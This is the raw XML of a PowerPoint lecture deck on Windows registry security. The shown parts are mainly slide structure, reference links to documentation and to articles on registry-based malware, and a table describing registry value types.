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419" r:id="rId3"/>
    <p:sldId id="420" r:id="rId4"/>
    <p:sldId id="323" r:id="rId5"/>
    <p:sldId id="341" r:id="rId6"/>
    <p:sldId id="324" r:id="rId7"/>
    <p:sldId id="331" r:id="rId8"/>
    <p:sldId id="332" r:id="rId9"/>
    <p:sldId id="333" r:id="rId10"/>
    <p:sldId id="367" r:id="rId11"/>
    <p:sldId id="330" r:id="rId12"/>
    <p:sldId id="328" r:id="rId13"/>
    <p:sldId id="329" r:id="rId14"/>
    <p:sldId id="334" r:id="rId15"/>
    <p:sldId id="335" r:id="rId16"/>
    <p:sldId id="383" r:id="rId17"/>
    <p:sldId id="384" r:id="rId18"/>
    <p:sldId id="404" r:id="rId19"/>
    <p:sldId id="422" r:id="rId20"/>
    <p:sldId id="362" r:id="rId21"/>
    <p:sldId id="369" r:id="rId22"/>
    <p:sldId id="363" r:id="rId23"/>
    <p:sldId id="368" r:id="rId24"/>
    <p:sldId id="364" r:id="rId25"/>
    <p:sldId id="365" r:id="rId26"/>
    <p:sldId id="370" r:id="rId27"/>
    <p:sldId id="371" r:id="rId28"/>
    <p:sldId id="389" r:id="rId29"/>
    <p:sldId id="390" r:id="rId30"/>
    <p:sldId id="391" r:id="rId31"/>
    <p:sldId id="392" r:id="rId32"/>
    <p:sldId id="393" r:id="rId33"/>
    <p:sldId id="394" r:id="rId34"/>
    <p:sldId id="395" r:id="rId35"/>
    <p:sldId id="396" r:id="rId36"/>
    <p:sldId id="397" r:id="rId37"/>
    <p:sldId id="372" r:id="rId38"/>
    <p:sldId id="373" r:id="rId39"/>
    <p:sldId id="374" r:id="rId40"/>
    <p:sldId id="366" r:id="rId41"/>
    <p:sldId id="376" r:id="rId42"/>
    <p:sldId id="385" r:id="rId43"/>
    <p:sldId id="375" r:id="rId44"/>
    <p:sldId id="377" r:id="rId45"/>
    <p:sldId id="386" r:id="rId46"/>
    <p:sldId id="378" r:id="rId47"/>
    <p:sldId id="379" r:id="rId48"/>
    <p:sldId id="423" r:id="rId49"/>
    <p:sldId id="380" r:id="rId50"/>
    <p:sldId id="381" r:id="rId51"/>
    <p:sldId id="387" r:id="rId52"/>
    <p:sldId id="418" r:id="rId53"/>
    <p:sldId id="416" r:id="rId54"/>
    <p:sldId id="417" r:id="rId55"/>
    <p:sldId id="382" r:id="rId56"/>
    <p:sldId id="409" r:id="rId57"/>
    <p:sldId id="413" r:id="rId58"/>
    <p:sldId id="414" r:id="rId59"/>
    <p:sldId id="415" r:id="rId60"/>
    <p:sldId id="411" r:id="rId61"/>
    <p:sldId id="398" r:id="rId62"/>
    <p:sldId id="399" r:id="rId63"/>
    <p:sldId id="400" r:id="rId64"/>
    <p:sldId id="401" r:id="rId65"/>
    <p:sldId id="402" r:id="rId66"/>
    <p:sldId id="403" r:id="rId67"/>
    <p:sldId id="284" r:id="rId68"/>
    <p:sldId id="285" r:id="rId69"/>
    <p:sldId id="286" r:id="rId70"/>
    <p:sldId id="287" r:id="rId71"/>
    <p:sldId id="288" r:id="rId72"/>
    <p:sldId id="289" r:id="rId73"/>
    <p:sldId id="291" r:id="rId74"/>
    <p:sldId id="292" r:id="rId75"/>
    <p:sldId id="293" r:id="rId76"/>
    <p:sldId id="407" r:id="rId77"/>
    <p:sldId id="424" r:id="rId78"/>
    <p:sldId id="425" r:id="rId79"/>
    <p:sldId id="426" r:id="rId80"/>
    <p:sldId id="427" r:id="rId81"/>
    <p:sldId id="428" r:id="rId82"/>
    <p:sldId id="429" r:id="rId83"/>
    <p:sldId id="430" r:id="rId84"/>
    <p:sldId id="431" r:id="rId85"/>
    <p:sldId id="432" r:id="rId86"/>
    <p:sldId id="408" r:id="rId8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C10"/>
    <a:srgbClr val="FB33D0"/>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18" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="-1446" y="-90"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-17664"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="188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082A6-6E35-4955-B975-EE9646A91BE1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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F9650-42BB-4FDB-9C8B-E292845A62C4}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383905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346A2D3-4F90-4463-BD61-34B894F40052}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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E96A04-6FFE-4647-B1EB-FABF2537EC88}"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5BF5BC-59AC-479C-B725-E1DA21B0B670}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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E96A04-6FFE-4647-B1EB-FABF2537EC88}"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804F272-4B85-41BC-824A-12F52108068A}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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E96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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D3C2214-1D98-47FE-B76E-F835ABBFB05D}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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E96A04-6FFE-4647-B1EB-FABF2537EC88}"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365F745-7B1B-4D37-8FA2-527EA5F13432}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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E96A04-6FFE-4647-B1EB-FABF2537EC88}"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F4504608-14AF-4DD8-9CCF-726AE8A71E96}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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E96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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E58D6A7-9769-42B7-BDC9-264FD19B1B55}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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AE96A04-6FFE-4647-B1EB-FABF2537EC88}"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2BDF1C91-B784-41D1-9493-AF1D4BC13594}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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AE96A04-6FFE-4647-B1EB-FABF2537EC88}"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7477524-BDE7-4B80-A187-D55B4FE3DD07}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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AE96A04-6FFE-4647-B1EB-FABF2537EC88}"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4BE5B3E-1761-43A6-B063-808971FA93E9}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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E96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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83E1BC0-2711-41E5-B989-9B339E39FFCF}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13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E96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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BAFB404-4DB7-4E6F-AECE-90DEF7ED52DA}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/11/13</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AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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cs.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-regist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cs.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-regist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cs.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-regist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cs.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-regist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ifewire.com/what-is-a-registry-value-262604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s64.com/nt/syntax-variabl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owtogeek.com/382727/what-is-a-reg-file-and-how-do-i-open-one/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.webnots.com/3-ways-to-customize-right-click-menu-in-windows-10/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kb.uconn.edu/space/IKB/10737647782/Understanding+the+Registry+on+Windows" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/powershell-create-registry-key/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.raymond.cc/blog/convert-windows-registry-hex-to-text/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thewindowsclub.com/create-a-registry-key-in-window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oftwareok.com/?page=Windows/10/Registry/1#Bild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oftwareok.com/?seite=faq-Windows-10&amp;faq=26" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.softwareok.com/?seite=faq-Windows-10&amp;faq=28" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.softwareok.com/?page=Windows/10/Registry/1#Bild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dcanary.com/blog/windows-registry-attacks-threat-detection/" TargetMode="External"/><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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hawkdive.com/15-best-registry-hacks-for-windows-11/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.prevailion.com/darkwatchman-new-fileless-technique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oftwareok.com/?page=Windows/10/Registry/1#Bild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oftwareok.com/?page=Windows/10/Registry/1#Bild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softwareok.com/?page=Windows/10/Registry/1#Bild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oftwareok.com/?page=Windows/10/Registry/1#Bild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oftwareok.com/?seite=faq-Windows-10&amp;faq=2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s.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-registr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sensei-infosec.netlify.app/forensics/registry/persistence/2020/04/15/malware-persistence-registry.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microsoft.com/en-us/windows/win32/sysinfo/registry"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cyberonesecurity.com/blog/abusing-mshta-exe-to-gain-powershell-acces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learn.microsoft.com/en-us/windows-server/administration/windows-commands/wscrip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thehackernews.com/2021/12/new-fileless-malware-uses-window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cyberonesecurity.com/blog/abusing-mshta-exe-to-gain-powershell-acces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ocs.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-registry"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blogs.blackberry.com/en/2018/01/threat-spotlight-kovter-malware-fileless-persistence-mechanism" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2016/07/22/kovter-becomes-almost-file-less-creates-a-new-file-type-and-gets-some-new-certificates/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comparitech.com/blog/information-security/fileless-malware-attacks/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/blog/news/2020/10/kraken-attack-abuses-wer-service"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docs.microsoft.com/en-us/windows/win32/sysinfo/handles-and-object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docs.microsoft.com/en-us/windows/win32/sysinfo/handles-and-object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docs.microsoft.com/en-us/windows/win32/sysinfo/object-manager"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docs.microsoft.com/en-us/windows/win32/sysinfo/object-manager"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docs.microsoft.com/en-us/windows/win32/sysinfo/object-manager"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microsoft.com/en-us/windows/win32/sysinfo/registry-element-size-limits" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-value-types" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-registry"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docs.microsoft.com/en-us/windows/win32/shell/context-menu-reference" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/shell/context-menu-handlers" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/shell/fa-verbs"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docs.microsoft.com/en-us/windows/win32/shell/context-menu-handler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docs.microsoft.com/en-us/windows/win32/shell/fa-verbs" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/shell/context-menu"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cs.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-registry"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ocs.microsoft.com/en-us/windows/win32/shell/fa-verbs" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lifewire.com/hkey-classes-root-2625899"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docs.microsoft.com/en-us/windows/win32/shell/fa-verb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tarma.com/support/im9/using/panes/component.htm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tarma.com/support/im9/using/panes/file_type.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tarma.com/support/im9/using/panes/shell_verb.ht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ocs.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-regist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Security of Windows Keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>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AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3904281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029034181"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="251519" y="1970905"/>
          <a:ext cx="8640960" cy="4686212"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2952329"/>
                <a:gridCol w="5688631"/>
              </a:tblGrid>
              <a:tr h="228467">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>Value Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>Value Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="742516">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>String</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Contains human-readable strings with alphanumeric characters. Indicated by the phrase ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="226C10"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>REG_SZ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>’ with a red symbol stating ‘ab’</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="742516">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Multi-string Value</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>Contains </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>a list of values </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>rather than a single-line text. Indicated by the phrase ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="226C10"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>REG_MULTI_SZ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>’ with a red symbol stating ‘ab’</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="913865">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400"/>
                        <a:t>Expandable String Value</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>Hold variables whose actual value is used by the OS at the time of execution or need. Indicated by the phrase ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="226C10"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>REG_EXPAND_SZ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>’ with a red symbol stating ‘ab’</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="572950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400"/>
                        <a:t>Binary Values</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>Contain binary values only. Indicated by ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="226C10"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>REG_BINARY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>’ with a blue icon containing binary </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>numeric</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1427917">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400"/>
                        <a:t>DWORD (32-bit) and QWORD (64-bit)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>Binary or hexa-decimal numbers used to satisfy the bit length of the value. A word equates to ‘16-bits’. Double word and Quad word are multiplied by 2 and 4, respectively. Indicated by ‘DWORD’ and ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="226C10"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>QWORD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>’ with a blue icon containing binary </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>numeric</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="42608" marR="42608" marT="21304" marB="21304" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
